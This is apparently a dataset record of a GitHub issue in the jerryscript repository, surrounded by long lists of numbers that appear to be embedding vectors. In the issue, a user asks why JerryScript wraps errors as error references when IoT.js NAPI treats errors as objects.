0.00215111649595201, -0.008827959187328815, -0.013081302866339684, 0.013633050955832005, -0.014024162665009499, -0.014820354990661144, 0.010154946707189083, 0.0001248415937880054, -0.002495085820555687, 0.006498746573925018, -0.00875113345682621, 0.007249542511999607, -0.013919400982558727, 0.021804500371217728, 0.015476864762604237, 0.0039390577003359795, -0.0005770649877376854, 0.009693993255496025, -0.0019398462027311325, -0.009938438422977924, 0.009889548644423485, 0.006362556014209986, -0.023089582100510597, -0.00455017015337944, -0.0036527076736092567, 0.014142893254756927, 0.010099072940647602, 0.02042163908481598, 0.01899687387049198, -0.028104199096560478, -0.00803176686167717, -0.0054266806691884995, 0.007563828956335783, 0.01405908353626728, 0.004061280284076929, -0.017823537811636925, -0.024919427931308746, -0.00763367023319006, -0.0021912753582000732, -0.02802038937807083, -0.003799374680966139, 0.022768311202526093, 0.002493339590728283, 0.00014044679119251668, -0.007284462917596102, -0.028369596228003502, 0.02518482692539692, 0.005000647623091936, 0.004923821892589331, -0.012487650848925114, 0.013423526659607887, -0.008290180005133152, -0.0010572249302640557, -0.02825785055756569, -0.0133117800578475, 0.0030608014203608036, -0.014317496679723263, -0.019374018535017967, 0.006704778876155615, 0.029836267232894897, 0.01536511816084385, 0.013849559240043163, 0.022921962663531303, -0.02230735868215561, -0.011509870178997517, -0.008213354274630547, -0.007130811922252178, -0.006970176473259926, 0.0075708129443228245, -0.01197780855000019, -0.007626686245203018, -0.005636204965412617, 0.013318764045834541, 0.018759412690997124, 0.007445098366588354, -0.004057788290083408, 0.0011680981842800975, -0.008485736325383186, -0.025743557140231133, 0.011635584756731987, 0.010874313302338123, -0.013598130084574223, -0.005231124348938465, -0.005018108058720827, 0.014485116116702557, 0.009707961231470108, -0.013255907222628593, 0.03232262283563614, 0.022377200424671173, 0.003097468288615346, -0.013989241793751717, -0.0056222365237772465, 0.004714297596365213, 0.014946069568395615, -0.014666704460978508, 0.0050914413295686245, -0.014100988395512104, 0.01998862251639366, -0.0038936606142669916, -0.007961925119161606, -0.008464783430099487, -0.001677067717537284, 0.015476864762604237, 0.006041285116225481, 0.017236869782209396, 0.01070669386535883, 0.007047002203762531, 0.00850668828934431, 0.014568925835192204, 0.0029612774960696697, 0.009952406398952007, 0.009386690333485603, -0.014834323897957802, -0.005594300106167793, 0.0040857247076928616, -0.019765129312872887, -0.011321298778057098, 0.0034274691715836525, -0.009847643785178661, -0.0030642934143543243, 0.00713779591023922, 0.020267987623810768, 0.01526734046638012, 0.0046828691847622395, 0.018913064152002335, 0.0058352528139948845, 0.006690810900181532, 0.008897799998521805, 0.008492720313370228, -0.0018263538368046284, 0.012264158576726913, -0.0073403362184762955, 0.014471148140728474, -0.005011124070733786, 0.00927494466304779, 0.017041312530636787, -0.005699062254279852, 0.01023875642567873, -0.01699940860271454, -0.020254019647836685, -0.004075248260051012, 0.031456589698791504, 0.02017020992934704, 0.00651969900354743, -0.005384775809943676, -0.0056746178306639194, -0.005506998393684626, 0.011314314790070057, 0.013060350902378559, 0.0175581406801939, 0.007466050796210766, -0.008737165480852127, -0.02285212092101574, -0.018354332074522972, -0.014066067524254322, 0.012424794025719166, -0.01405908353626728, 0.005192711483687162, -0.01676194742321968, 0.013605114072561264, -0.0013863526983186603, -0.0042219157330691814, 0.014596862718462944, -0.0004888901603408158, 0.0038587399758398533, 0.02781086415052414, -0.0010301613947376609, 0.015071784146130085, 0.023173391819000244, -0.008632402867078781, -0.013619082048535347, -0.005007631611078978, 0.0014623053139075637, -0.0041381060145795345, -0.00011316496966173872, 0.00603779312223196, -0.00666985847055912, -0.028132135048508644, -0.010106057859957218, -0.010811456479132175, 0.021790532395243645, 0.009407643228769302, -0.0023239741567522287, -0.0036073108203709126, 0.021539103239774704, 0.01516956277191639, 0.004459376446902752, -0.01998862251639366, -0.005824776832014322, 0.007815257646143436, -0.0004932552110403776, 0.03221087530255318, -0.008786054328083992, -0.01033653412014246, 0.022474978119134903, 0.00043607252882793546, 0.004927314352244139, 0.02776896022260189, 0.01695750281214714, -0.013060350902378559, 0.013095271773636341, 0.0026609592605382204, 0.0013095272006466985, 0.01843814179301262, -0.009435579180717468, -0.003715564962476492, -0.0113003458827734, -0.009477484039962292, 0.004951758775860071, -0.021008307114243507, -0.0065476358868181705, 0.02835562825202942, -0.005479061510413885, 0.015448927879333496, 0.01958354189991951, -0.02275434322655201, 0.013702891767024994, -0.0023222281597554684, -0.020812751725316048, 0.005706046242266893, 0.018158776685595512, 0.026637528091669083, 0.013912416063249111, 0.001306035090237856, 0.021203864365816116, 0.006027317140251398, 0.031065475195646286, 0.01958354189991951, -0.013640034943819046, -0.007996845990419388, -0.002681911690160632, 0.021594975143671036, -0.00026321495533920825, -0.018284490332007408, -0.0033628656528890133, -0.0008490100735798478, -0.024877524003386497, -0.019765129312872887, 0.003221436869353056, 0.012229237705469131, 0.043804556131362915, 0.007493987213820219, 0.0030834998469799757, -0.037267398089170456, 0.015057816170156002, -0.015127657912671566, -0.014806387014687061, 0.010140977799892426, 0.013402573764324188, 0.005992396268993616, 0.005440648645162582, -0.005901602562516928, -0.0020603227894753218, -0.023983553051948547, -0.004916837904602289, 0.002173815155401826, 0.010224787518382072, 0.00701557332649827, 0.003411754732951522, -0.005527950823307037, 0.0005277394666336477, -0.03450167551636696, -0.008758117444813251, -0.00215111649595201, 0.006572080310434103, -0.007466050796210766, -0.020212115719914436, -0.01839623786509037, 0.016887662932276726, -0.03866422548890114, -0.009281928651034832, -0.004117153584957123, 0.00405080383643508, -0.0155467065051198, -0.016524486243724823, -0.0026452448219060898, -0.0036282632499933243, 0.011747331358492374, 0.012955588288605213, 0.0030957222916185856, -0.031065475195646286, -0.009295896627008915, -0.028383564203977585, 0.002379847224801779, 0.00043716380605474114, 0.0036282632499933243, -0.029668647795915604, -0.010790503583848476, -0.025114985182881355, -0.0001260419812751934, -0.0004984933184459805, 0.01620321534574032, -0.0021371482871472836, 0.014624799601733685, -0.03570294752717018, -0.0010659551480785012, -0.017474330961704254, -0.002152862725779414, 0.015937818214297295, -0.00029311582329683006, 0.010455264709889889, -0.0068619223311543465, 0.006128586828708649, -0.006016840692609549, 0.021832436323165894, 0.008436846546828747, -0.012892731465399265, -0.002798896050080657, 0.023229265585541725, 0.008967641741037369, 0.029389280825853348, 0.014485116116702557, -0.004239375703036785, -0.004633979871869087, -0.006886366754770279, 0.00038805653457529843, 0.0009699231013655663, -0.009693993255496025, -0.002072545001283288, 0.012215268798172474, -0.007022557780146599, -0.010504153557121754, 0.02924959920346737, 0.005877157673239708, 0.01690163090825081, 0.014764482155442238, 0.005053028929978609, -0.012599397450685501, 0.004242868162691593, -0.002240164438262582, -0.011363203637301922, -0.017711790278553963, -0.014680672436952591, 0.0027098481077700853, -0.003125404706224799, 0.009624151512980461, 0.009924469515681267, 0.03237849473953247, -0.010713677853345871, -0.0040857247076928616, 0.007123827468603849, 0.006352079566568136, -0.004805091768503189, 0.007249542511999607, -0.022097833454608917, 0.012054634280502796, -0.00431270943954587, 0.0030939760617911816, 0.01254352368414402, 0.00937272235751152, -0.007487003225833178, -0.003160325577482581, -0.002420006087049842, 0.018158776685595512, 0.011509870178997517, -0.014359401538968086, 0.007717479951679707, -0.020407671108841896, -0.002697625895962119, 0.012431778013706207, 0.007528908085078001, 0.005594300106167793, 0.004019375424832106, 0.026483876630663872, 0.006163507699966431, -0.00801081396639347, 0.015197498723864555, 0.004459376446902752, -0.016971472650766373, 0.025128953158855438, -0.016035595908761024, 0.012627333402633667, -0.008513672277331352, -0.00921907089650631, 0.0460115447640419, 0.007808273658156395, 0.03411056473851204, -0.018619729205965996, 0.00009352206689072773, -0.025101017206907272, -0.012536539696156979, -0.016300993040204048, -0.0016988932620733976, 0.023131487891077995, -0.015951786190271378, 0.00046139006735756993, 0.007507955655455589, -0.007047002203762531, 0.018130840733647346, 0.0018595285946503282, -0.0027238165494054556, 0.024221014231443405, -0.01526734046638012, -0.0026225463952869177, -0.006125094834715128, 0.0024584189523011446, 0.013793686404824257, -0.01651051826775074, -0.016650201752781868, -0.006823509465903044, 0.010343518108129501, 0.008988594636321068, 0.015462896786630154, 0.014694640412926674, 0.022223548963665962, 0.00202540191821754, 0.004805091768503189, -0.0015679404605180025, -0.0038098508957773447, 0.005395251791924238, 0.019318144768476486, 0.011907966807484627, 0.0012510349042713642, -0.013968289829790592, -0.017069250345230103, 0.0008477005758322775, 0.0006036920240148902, -0.004061280284076929, 0.027489593252539635, -0.0194298904389143, -0.010650821030139923, 0.018033061176538467, 0.0035165168810635805, 0.0005211918032728136, 0.029221661388874054, 0.016538454219698906, -0.0239416491240263, -0.0009900025324895978, 0.01254352368414402, 0.0064009688794612885, -0.014094004407525063, -0.028271818533539772, 0.017460361123085022, -0.00825525913387537, 0.002369371009990573, -0.0216648168861866, 0.0028530231211334467, 0.0004675012023653835, -0.015085753053426743, -0.012662254273891449, -0.004281280562281609, -0.0003238897188566625, 0.004997155629098415, 0.005252076778560877, -0.015644485130906105, -0.0021319102961570024, 0.005073981359601021, 0.013151144608855247, 0.0068619223311543465, -0.026148637756705284, -0.01839623786509037, 0.007654622662812471, 0.011090821586549282, -0.015155593864619732, 0.016147343441843987, -0.008925736881792545, 0.015895914286375046, -0.0056047760881483555, -0.0029979441314935684, -0.01571432501077652, 0.010078120976686478, 0.005080965347588062, 0.0005761919310316443, 0.013514320366084576, -0.012704159133136272, 0.02380196563899517, -0.012515587732195854, -0.0016351628582924604, -0.0003171238349750638, 0.0016561152879148722, -0.009260975755751133, 0.000630755559541285, -0.0007577796932309866, 0.021553071215748787, 0.0064219213090837, -0.005171759054064751, -0.0018350840546190739, -0.0004596440412569791, 0.004309217445552349, 0.004637472331523895, 0.01204764936119318, -0.0012466697953641415, -0.007710495963692665, 0.011593679897487164, -0.0022646088618785143, 0.009833675809204578, -0.005112393759191036, -0.016873693093657494, 0.012285110540688038, -0.0022349264472723007, 0.004874933045357466, 0.021930214017629623, 0.010448280721902847, 0.003411754732951522, 0.0025369906798005104, -0.019751161336898804, 0.01606353372335434, 0.007005097344517708, 0.0180470310151577, 0.012361936271190643, 0.013388605788350105, 0.012306063435971737, 0.003502548672258854, -0.016943534836173058, 0.0030171505641192198, -0.008213354274630547, 0.04260328412055969, 0.01929020881652832, 0.004623503889888525, 0.012333999387919903, -0.010106057859957218, -0.0005373426247388124, 0.02701467275619507, -0.007473034784197807, 0.01120256818830967, 0.03380326181650162, -0.021790532395243645, 0.005276521202176809, -0.0155467065051198, 0.010315582156181335, -0.00003934037886210717, -0.011195584200322628, -0.011761300265789032, -0.04000518098473549, 0.012780984863638878, 0.014568925835192204, 0.002685403684154153, -0.01620321534574032, -0.01839623786509037, 0.01445718016475439, 0.025310540571808815, 0.010972091928124428, 0.03142865002155304, 0.007179700769484043, -0.008199386298656464, 0.011719395406544209, 0.0011157171102240682, 0.006718747317790985, 0.0065790642984211445, 0.0065301754511892796, 0.0019607986323535442, -0.026455940678715706, -0.0079060522839427, 0.011412092484533787, -0.030953729525208473, -0.0023274661507457495, 0.021287674084305763, -0.008080655708909035, 0.009058435447514057, 0.019108619540929794, 0.019751161336898804, -0.007354304660111666, 0.023019740357995033, -0.006865414325147867, 0.00018278816423844546, 0.006711763329803944, 0.030674364417791367, 0.0011462727561593056, 0.028634993359446526, -0.016482582315802574, -0.01526734046638012, -0.0037190571893006563, 0.01899687387049198, -0.014485116116702557, 0.008737165480852127, 0.011041932739317417, -0.005720014683902264, -0.02057529054582119, 0.007148272357881069, -0.012760032899677753, 0.00504255248233676, 0.022628629580140114, 0.00810160767287016, 0.007088907063007355, 0.01929020881652832, 0.01666416972875595, 0.0103644710034132, 0.0071098594926297665 ]
158
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
When I am using iot.js NAPI, the NAPI treat error as object, but in jerryscript, error is not an object but a error reference to object. That's inconsistence with n-api and getting iot.js napi doesn't support for external errors.
Question, why ecma_create_error_reference are needed, as error are also an object.
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4551/comments
5
2021-01-29T12:49:20
2021-12-07T05:39:12Z
https://github.com/jerryscript-project/jerryscript/issues/4551
796,856,163
4,551
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : Question, why ecma_create_error_reference are needed, as error are also an object. Issue date: --- start body --- When I am using iot.js NAPI, the NAPI treat error as object, but in jerryscript, error is not an object but a error reference to object. That's inconsistence with n-api and getting iot.js napi doesn't support for external errors. --- end body ---
438
[ -0.025410164147615433, -0.006129334215074778, -0.025835320353507996, 0.029080679640173912, 0.03219849243760109, 0.04183536395430565, -0.008942450396716595, 0.024659056216478348, -0.051047079265117645, 0.015900839120149612, 0.012237410992383957, 0.010912341065704823, 0.0008883991977199912, -0.008850333280861378, 0.030894679948687553, 0.021357009187340736, -0.02705410122871399, -0.019103681668639183, -0.018310056999325752, 0.014696230180561543, -0.004368479363620281, 0.038575831800699234, -0.007440232206135988, 0.024928322061896324, -0.019387120380997658, -0.005463256500661373, 0.01961386948823929, -0.01958552561700344, -0.06025879457592964, -0.01787072978913784, 0.023411931470036507, -0.0223348680883646, -0.0034526220988482237, -0.004113385453820229, 0.01192562934011221, 0.008687357418239117, 0.044754769653081894, 0.03919939696788788, -0.03024277277290821, -0.01843760348856449, 0.018650181591510773, -0.021569587290287018, 0.0033817626535892487, 0.033729054033756256, 0.0013879575999453664, 0.06093904748558998, 0.03336058557033539, 0.026047898456454277, -0.007461490109562874, 0.01386008970439434, 0.010196661576628685, -0.02488580532371998, 0.004155901260674, -0.05623398348689079, 0.003502223640680313, 0.021016884595155716, 0.028598835691809654, -0.0320567712187767, 0.009325090795755386, -0.011826426722109318, 0.0064800879918038845, 0.006423400714993477, -0.020832650363445282, 0.004400365985929966, -0.005916756112128496, 0.0905299112200737, -0.045661769807338715, 0.009247145615518093, 0.04228886216878891, -0.0005137303378432989, 0.02382291480898857, -0.0029814073350280523, 0.03713030368089676, 0.0722765401005745, -0.01891944743692875, -0.019514666870236397, 0.015504026785492897, 0.03817902132868767, 0.007907903753221035, -0.03721533343195915, 0.0038299481384456158, 0.008573981933295727, 0.030497867614030838, 0.010969027876853943, -0.0016979672946035862, -0.040276456624269485, -0.00045349987340159714, -0.06031548231840134, 0.018069135025143623, 0.008751130662858486, -0.0006005330360494554, 0.036960240453481674, -0.042458925396203995, -0.00882907584309578, 0.009693560190498829, 0.013094808906316757, -0.008333059959113598, -0.004322420805692673, -0.02682735212147236, -0.022193150594830513, 0.059181734919548035, 0.03418255224823952, -0.011557160876691341, -0.013512878678739071, 0.005130217410624027, 0.017261339351534843, 0.049204736948013306, -0.016807839274406433, 0.019174542278051376, 0.10487184673547745, 0.02190971188247204, 0.0006780354888178408, -0.05889829620718956, -0.02762097679078579, 0.000005366350706026424, 0.027224164456129074, -0.010104544460773468, -0.024545680731534958, 0.015192246064543724, 0.027918586507439613, -0.050366830080747604, -0.002644825493916869, -0.01547568291425705, -0.013385332189500332, -0.01694955863058567, 0.021215291693806648, 0.030299460515379906, 0.014405706897377968, 0.058728232979774475, 0.01911785453557968, -0.020081540569663048, -0.007504005916416645, 0.02509838342666626, 0.011252465657889843, 0.02003902569413185, -0.0025084211956709623, 0.00034322499413974583, 0.026515571400523186, -0.04308248683810234, -0.04435795545578003, -0.035117898136377335, -0.030894679948687553, 0.01764397881925106, -0.028683867305517197, 0.013527050614356995, -0.01500801183283329, 0.01604255847632885, 0.013838832266628742, -0.04903467372059822, 0.0000498229856020771, -0.0009238288621418178, -0.015560714527964592, -0.008623583242297173, -0.014363191090524197, 0.00558371702209115, 0.013116066344082355, -0.023780399933457375, 0.01582998037338257, -0.018139995634555817, 0.03253861516714096, -0.03463605418801308, -0.03231186792254448, -0.0073339431546628475, 0.021399525925517082, -0.032595302909612656, 0.005682920105755329, 0.00266254018060863, 0.012811371125280857, -0.02854214794933796, 0.02165461890399456, -0.016127590090036392, 0.008269286714494228, 0.012081519700586796, 0.0246307123452425, -0.001756426296196878, -0.018380917608737946, 0.031915053725242615, 0.006721009965986013, -0.004651916678994894, -0.006451744120568037, 0.00968647375702858, 0.008488951250910759, 0.015149730257689953, -0.013094808906316757, -0.009814021177589893, -0.04274236410856247, 0.009006224572658539, -0.025410164147615433, 0.015135558322072029, -0.015234761871397495, -0.0177431832998991, -0.004885752685368061, 0.02600538358092308, -0.022660821676254272, 0.027124961838126183, -0.0009238288621418178, -0.016425197944045067, -0.04753245413303375, -0.017332198098301888, -0.028783069923520088, 0.05901167169213295, -0.017488088458776474, -0.02198057249188423, -0.0240780096501112, -0.012407473288476467, -0.024616539478302002, 0.018012449145317078, -0.02794693037867546, -0.008517294190824032, -0.03177333623170853, 0.014086839742958546, -0.01762980781495571, 0.022958431392908096, -0.054249923676252365, 0.04824104905128479, -0.00041076281922869384, 0.026529742404818535, -0.012946004047989845, -0.028556320816278458, 0.006650150753557682, 0.02715330570936203, -0.01636851206421852, -0.01993982307612896, -0.009728989563882351, -0.01551819872111082, 0.00848186481744051, -0.002396817784756422, -0.013222355395555496, -0.008772388100624084, -0.002570423064753413, -0.0032382726203650236, 0.009431379847228527, -0.011812254786491394, -0.008233857341110706, -0.0027351712342351675, 0.02110191620886326, -0.029874304309487343, -0.031915053725242615, -0.014448222704231739, 0.02888227254152298, -0.019571354612708092, 0.015872495248913765, -0.04146689549088478, -0.009658129885792732, -0.023808743804693222, -0.0033746769186109304, -0.015631573274731636, -0.010862738825380802, -0.02817367948591709, 0.01100445818156004, -0.018834415823221207, -0.04330923780798912, 0.010451754555106163, -0.010848567821085453, -0.0035146239679306746, 0.008843247778713703, 0.014752917923033237, 0.045661769807338715, 0.011231208220124245, -0.031121429055929184, 0.04495317488908768, 0.036478396505117416, -0.012577535584568977, -0.002426933031529188, -0.013151496648788452, -0.010770621709525585, -0.04172198846936226, -0.007879560813307762, -0.01765815168619156, 0.004318877588957548, 0.04741908237338066, -0.052322547882795334, 0.002329501323401928, 0.05028180032968521, -0.013874261640012264, 0.004364936146885157, 0.00796459149569273, 0.0200673695653677, 0.011613848619163036, -0.008751130662858486, 0.007124908268451691, -0.004017725586891174, 0.02694072760641575, 0.030299460515379906, -0.017969932407140732, -0.0015668774722144008, -0.014363191090524197, -0.017558949068188667, -0.02302929013967514, 0.0017502261325716972, -0.014682058244943619, -0.04070161283016205, -0.025608571246266365, -0.0071745095774531364, -0.0035270245280116796, -0.018621839582920074, -0.003822862170636654, 0.0052081625908613205, 0.02555188350379467, 0.009821106679737568, -0.008673185482621193, -0.05629067122936249, -0.026614774018526077, 0.0062958537600934505, -0.035939864814281464, -0.00000968780295806937, 0.029364116489887238, 0.0068769003264606, 0.012265754863619804, -0.00006858964479761198, 0.03273702412843704, 0.015433168038725853, -0.02098854072391987, -0.038660865277051926, -0.0017776840832084417, 0.01958552561700344, 0.01638268306851387, -0.016297651454806328, -0.027535945177078247, -0.001264839549548924, -0.025920351967215538, -0.003064667107537389, -0.037413738667964935, 0.012414558790624142, 0.0378388948738575, 0.005938014015555382, -0.03310549259185791, -0.028613008558750153, -0.024262243881821632, -0.04503820464015007, 0.0059876153245568275, -0.04903467372059822, 0.002961921039968729, 0.033388927578926086, -0.04424457997083664, -0.036960240453481674, -0.05203910917043686, 0.008581068366765976, 0.017842385917901993, -0.005548287648707628, 0.014285245910286903, -0.017573120072484016, -0.021215291693806648, 0.008063795045018196, 0.007666982244700193, -0.02725250832736492, -0.03239689767360687, 0.04251561313867569, 0.024219727143645287, 0.03143320977687836, 0.0007732527446933091, 0.033388927578926086, -0.0028414600528776646, 0.003601426724344492, 0.057906266301870346, -0.020535040646791458, -0.024729914963245392, -0.03072461672127247, 0.03772551938891411, 0.024574024602770805, -0.01265548076480627, -0.0020921225659549236, 0.013123152777552605, 0.016864527016878128, 0.02657225914299488, 0.009884879924356937, 0.011620934121310711, -0.013881348073482513, -0.023907946422696114, -0.043479301035404205, -0.0006567776435986161, -0.0034543934743851423, -0.029760928824543953, -0.027422571554780006, -0.032481927424669266, 0.0002734728332143277, 0.008694442920386791, 0.0011328639229759574, 0.010706848464906216, 0.02933577261865139, 0.027011586353182793, -0.008531466126441956, 0.003723659086972475, -0.022845055907964706, 0.004712147172540426, 0.007865388877689838, 0.009509325958788395, -0.0028379173018038273, 0.017969932407140732, -0.010983199812471867, -0.02130032144486904, 0.0006333054625429213, -0.01500801183283329, -0.043252550065517426, -0.027791040018200874, 0.031461555510759354, -0.0275076013058424, -0.022207321599125862, 0.010813137516379356, -0.0195004940032959, -0.01617010496556759, -0.028683867305517197, 0.01031712256371975, 0.02796110138297081, -0.03412586450576782, -0.00409212801605463, -0.038689207285642624, -0.04481145739555359, 0.03137652203440666, 0.03183002397418022, -0.004970783833414316, 0.013633339665830135, 0.004981412552297115, 0.0401347391307354, 0.024800773710012436, 0.0029831789433956146, 0.01334990281611681, -0.00021833539358340204, -0.0131798405200243, -0.015971697866916656, 0.001948632299900055, -0.02223566547036171, -0.0062285372987389565, -0.0010513756424188614, -0.0075677791610360146, -0.01065724715590477, -0.050593581050634384, 0.008403919637203217, 0.022023087367415428, -0.009941567666828632, -0.035458020865917206, -0.024361446499824524, 0.020761791616678238, 0.01276885624974966, 0.029392460361123085, -0.004304705653339624, -0.00044530676677823067, -0.03117811679840088, -0.0015739634400233626, 0.001911431085318327, 0.028726382181048393, 0.02692655473947525, -0.00927548948675394, -0.01271925400942564, -0.018508464097976685, -0.009672301821410656, -0.06371673196554184, -0.027479257434606552, 0.005743150599300861, 0.025495195761322975, 0.04495317488908768, 0.007518177852034569, -0.006625349633395672, 0.023071806877851486, 0.006862728390842676, 0.02060590125620365, -0.021711306646466255, 0.008850333280861378, 0.0309513658285141, -0.020705103874206543, -0.012924746610224247, -0.008850333280861378, -0.016481885686516762, 0.015631573274731636, -0.007245369255542755, 0.035684771835803986, -0.008106309920549393, -0.039454489946365356, -0.006869814358651638, -0.01427107397466898, 0.0014171871589496732, 0.00029428774723783135, -0.023737885057926178, 0.046568769961595535, -0.010097458027303219, -0.011606762185692787, 0.006827299017459154, -0.010217919014394283, 0.020464181900024414, 0.017162136733531952, -0.006398599594831467, -0.024375617504119873, -0.0189052764326334, 0.03540133312344551, 0.0003735616628546268, -0.01328612957149744, 0.04058823734521866, 0.037867240607738495, 0.005364053416997194, 0.0024357903748750687, 0.0160567294806242, 0.012846801429986954, -0.0297892726957798, -0.04296911507844925, -0.021229462698101997, -0.01591501198709011, -0.043592676520347595, -0.028485460206866264, -0.001076176413334906, 0.014582855626940727, 0.007117822300642729, -0.03815067559480667, 0.005704178009182215, 0.011939801275730133, 0.0018086850177496672, 0.022944258525967598, -0.04447133094072342, 0.053116172552108765, -0.02624630555510521, -0.02348279021680355, 0.005835267715156078, -0.050338488072156906, -0.015404824167490005, -0.00581401027739048, -0.012853886932134628, -0.018267542123794556, -0.020818479359149933, 0.015645746141672134, 0.032708678394556046, 0.030894679948687553, -0.003317989408969879, -0.009381778538227081, -0.029930992051959038, 0.03676183521747589, 0.009466810151934624, 0.005994701292365789, -0.012889317236840725, 0.016240963712334633, -0.054958514869213104, -0.0331905223429203, -0.012060262262821198, 0.013300301507115364, 0.006575748324394226, 0.05578048527240753, -0.0055341157130897045, -0.0032294150441884995, 0.015985870733857155, 0.04064492508769035, -0.004981412552297115, -0.010628903284668922, 0.006795412395149469, 0.04673882946372032, -0.006798955146223307, -0.0037697176449000835, 0.01472457405179739, 0.013229441829025745, -0.008843247778713703, 0.0069902753457427025, 0.015404824167490005, 0.031008053570985794, -0.011153263039886951, -0.017601463943719864, 0.004648373927921057, 0.041636958718299866, -0.024999180808663368, -0.033842429518699646, -0.004733405075967312, 0.03412586450576782, -0.014639542438089848, -0.02474408783018589, 0.005169190000742674, 0.01846594735980034, 0.021116087213158607, -0.02199474349617958, -0.018239198252558708, -0.029420804232358932, 0.009360521100461483, 0.03863251954317093, -0.027124961838126183, -0.0005584603059105575, -0.0008046965813264251, -0.04044651985168457, 0.01948632299900055, -0.02865552343428135, -0.002040749415755272, -0.02679900825023651, -0.0019698902033269405, 0.010798965580761433, -0.0034295928198844194, 0.00337999127805233, 0.01981227658689022, -0.001105405972339213, -0.028499633073806763, 0.04231720790266991, -0.04342261329293251, -0.0032400439959019423, -0.00016629805031698197, -0.005509315058588982, -0.008963708765804768, -0.04770251736044884, -0.009084169752895832, -0.019174542278051376, -0.013427847996354103, 0.002352530602365732, 0.01992565020918846, -0.019160369411110878, -0.017913244664669037, 0.014993839897215366, 0.041892051696777344, -0.024659056216478348, 0.013229441829025745, 0.027677664533257484, 0.03015774115920067, -0.011181605979800224, -0.005317994859069586, 0.015234761871397495, 0.00019807404896710068, 0.004620030056685209, 0.008736958727240562, 0.03245358541607857, -0.014809605665504932, 0.024120524525642395, 0.02142786979675293, -0.014526167884469032, -0.03503286466002464, 0.000743137497920543, -0.023227697238326073, 0.02464488334953785, 0.002200182992964983, 0.025821149349212646, 0.02073344774544239, -0.024474821984767914, 0.02029411867260933, -0.01751643233001232, -0.004949525929987431, 0.03279370814561844, -0.014639542438089848, -0.03114977292716503, -0.003264844883233309, -0.000828168704174459, -0.0002641725295688957, -0.024262243881821632, -0.01042341161519289, -0.01095485594123602, 0.003698858432471752, 0.03633667901158333, 0.006519060581922531, 0.0000010898777418333339, -0.011443786323070526, -0.02073344774544239, -0.0060620177537202835, 0.008800731971859932, -0.02188136987388134, 0.018168339505791664, -0.004811350256204605, -0.006079732906073332, 0.0001884415978565812, 0.005899041425436735, -0.012860973365604877, -0.0014508452732115984, 0.002676712116226554, -0.03423923999071121, -0.01924540102481842, 0.007496919948607683, -0.00026749406242743134, 0.004102756734937429, 0.03148989751935005, 0.013016863726079464, -0.021456213667988777, 0.004800721537321806, -0.02107357233762741, 0.000846769311465323, 0.015206418000161648, -0.023199353367090225, 0.0065367757342755795, -0.006285225041210651, -0.018395088613033295, 0.01683618314564228, 0.005505771841853857, 0.033247210085392, 0.00893536489456892, -0.016226792708039284, -0.0045137410052120686, 0.009594356641173363, -0.018069135025143623, 0.002937120385468006, -0.029279084876179695, -0.010125801898539066, -0.011323325335979462, -0.004418080672621727, 0.004134643357247114, -0.004400365985929966, 0.0063135684467852116, 0.008389747701585293, 0.001996462233364582, 0.009381778538227081, -0.031093085184693336, -0.021682962775230408, 0.0025757376570254564, -0.0035234815441071987, -0.0009176286403089762, 0.02383708767592907, 0.04373439401388168, 0.024446478113532066, 0.009254232048988342, 0.02073344774544239, 0.036053240299224854, -0.0008888420416042209, -0.04019142687320709, 0.0006505774799734354, -0.021838853135704994, -0.001035432331264019, -0.005232963245362043, 0.013123152777552605, -0.01869269832968712, 0.015050526708364487, 0.027592632919549942, -0.014738745987415314, 0.015362308360636234, 0.01421438716351986, 0.004807807505130768, 0.00489638140425086, -0.022150633856654167, 0.0012852115323767066, -0.029619211331009865, -0.0068804435431957245, 0.025594398379325867, 0.004945983178913593, -0.02784772589802742, 0.016822010278701782, -0.019642213359475136, -0.002210811944678426, -0.020209088921546936, -0.03721533343195915, 0.006657236255705357, -0.02553771249949932, -0.0030859250109642744, 0.008035451173782349, -0.008092137984931469, 0.019103681668639183, -0.031348180025815964, -0.006558033172041178, -0.004651916678994894, 0.004109842702746391, -0.03299211710691452, 0.01615593396127224, -0.009537668898701668, 0.0189052764326334, 0.029845960438251495, -0.0033782196696847677, -0.0002409218141110614, -0.01857932284474373, -0.012060262262821198, 0.006093904376029968, 0.02108774334192276, -0.012917660176753998, -0.021130260080099106, 0.006196650676429272, -0.04260064288973808, -0.029930992051959038, 0.010147059336304665, 0.001212580711580813, -0.007217025384306908, -0.028641352429986, 0.0061364201828837395, 0.003032780485227704, 0.029619211331009865, -0.016411026939749718, 0.01220198068767786, -0.00650134589523077, -0.00238973181694746, 0.014540339820086956, -0.009913223795592785, 0.026444710791110992, 0.011358754709362984, -0.008496036753058434, 0.02450316585600376, -0.006735181901603937, -0.00441453792154789, 0.0010336608393117785, -0.02073344774544239, 0.017006244510412216, -0.056432392448186874, -0.0014924751594662666, 0.030072711408138275, -0.0007134651532396674, -0.024602368474006653, -0.00042471327469684184, -0.0469372384250164, 0.013597910292446613, -0.017969932407140732, -0.00029893789906054735, -0.02417721226811409, 0.010083286091685295, 0.019061166793107986, -0.02108774334192276, 0.01438444945961237, -0.010586387477815151, -0.002267499454319477, -0.0030097512062639, 0.013279043138027191, -0.033502303063869476, 0.023298555985093117, -0.0035748544614762068, 0.0027564289048314095, -0.012839714996516705, -0.022958431392908096, 0.025254273787140846, 0.004407451953738928, -0.011840598657727242, 0.02396463416516781, 0.005016842391341925, 0.01134458277374506, -0.003627998987212777, -0.004194873850792646, 0.022618306800723076, -0.015985870733857155, -0.01845177635550499, -0.038320738822221756, 0.013314472511410713, 0.0007271941285580397, 0.004903467372059822, -0.0038370341062545776, -0.04506655037403107, 0.012046090327203274, 0.026175446808338165, 0.022023087367415428, -0.019883135333657265, 0.02671397663652897, 0.04075830057263374, -0.030214428901672363, 0.008325974456965923, 0.015036355704069138, 0.003325075376778841, -0.028485460206866264, 0.029392460361123085, 0.02280254103243351, 0.0028609465807676315, 0.049686580896377563, 0.004903467372059822, -0.04571845754981041, -0.022434072569012642, -0.021385353058576584, -0.0027298566419631243, -0.05348464101552963, 0.00038175476947799325, 0.0018813158385455608, 0.004393280018121004, -0.00635962700471282, 0.022278182208538055, -0.0077520133927464485, 0.01048009842634201, 0.003542967839166522, -0.0018565150676295161, 0.015319792553782463, 0.010097458027303219, -0.024659056216478348, 0.0017759125912562013, 0.006986732594668865, -0.011663449928164482, -0.01055095810443163, 0.014781261794269085, -0.01003368478268385, 0.008092137984931469, -0.019174542278051376, -0.026175446808338165, 0.011188692413270473, 0.006430486682802439, 0.004432252608239651, -0.03693189471960068, 0.018281713128089905, 